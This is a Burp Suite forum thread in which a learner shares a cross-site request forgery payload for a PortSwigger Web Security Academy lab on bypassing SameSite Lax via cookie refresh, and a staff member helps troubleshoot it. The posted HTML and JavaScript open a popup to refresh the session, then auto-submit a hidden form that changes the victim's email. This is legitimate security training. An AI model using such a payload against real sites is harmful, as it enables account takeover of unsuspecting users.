Burp Suite User Forum


Lab: SameSite Lax bypass via cookie refresh - Question regarding victim behavior.

Jacek | Last updated: Aug 03, 2023 02:06PM UTC

Hi Team,

Are there any specific limitations on victim behavior, like a timeout or the number of URLs that the client enters? I tested the exploit on myself and it worked. I'm not sure why it's not working on the victim.

------------------
<p>Click anywhere on the page</p>
<form action="https://0a71002104c46b1780c1e9e6001e00e4.web-security-academy.net/my-account/change-email" method="POST">
    <input type="hidden" name="email" value="pwnd@o2.pl" />
</form>
<script>
window.onclick = () => { hack(); };
hack = function(){
    var popup = window.open('https://0a71002104c46b1780c1e9e6001e00e4.web-security-academy.net/logout');
    setTimeout(function(){
        popup.location.href = 'https://0a71002104c46b1780c1e9e6001e00e4.web-security-academy.net/my-account';
    }, 1000);
    setTimeout(function(){
        history.pushState('', '', '/');
        document.forms[0].submit();
    }, 6000);
};
</script>
--------------------

Changing the actions to:
1. logout
2. social-login
3. submit form
also didn't work. I'm wondering if it's my mistake or the victim's limitation.

Thanks,
J

Ben, PortSwigger Agent | Last updated: Aug 04, 2023 07:13AM UTC

Hi Jacek, Have you changed the email address that is being used in your exploit between testing it on yourself and then delivering it to the victim user?

Jacek | Last updated: Aug 04, 2023 08:27AM UTC

Hi Ben, Yes, I did. I try to modify the email address with every attempt. The only thing that worked was changing the actions to: 1. social-login 2. submit form. Thanks, Jacek

Ben, PortSwigger Agent | Last updated: Aug 04, 2023 03:37PM UTC

Hi Jacek, Let me have a chat with the Web Academy team about this so that we can definitively confirm the requirements of the lab. I will update this forum thread in due course.
